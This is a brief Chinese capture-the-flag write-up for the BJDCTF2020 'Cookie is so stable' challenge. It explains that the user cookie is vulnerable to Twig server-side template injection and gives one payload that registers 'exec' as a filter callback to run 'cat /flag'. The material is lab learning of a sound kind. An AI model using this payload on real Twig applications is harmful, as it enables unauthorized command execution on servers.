首页 > 其他 > 详细

[BJDCTF2020]Cookie is so stable

时间:2020-02-19 13:09:02      阅读:573      评论:0      收藏:0      [点我收藏+]

0x00 知识点

Twig模板注入
链接:

https://www.k0rz3n.com/2018/11/12/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E7%90%86%E8%A7%A3%E6%BC%8F%E6%B4%9E%E4%B9%8BSSTI%E6%BC%8F%E6%B4%9E/#2-Twig

0x01 解题

测试一下发现*wig模板注入
技术分享图片

技术分享图片

找注入点:
根据提示,cookie中的user是注入点
技术分享图片

payload:

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}};

技术分享图片

[BJDCTF2020]Cookie is so stable

原文:https://www.cnblogs.com/wangtanzhi/p/12330542.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!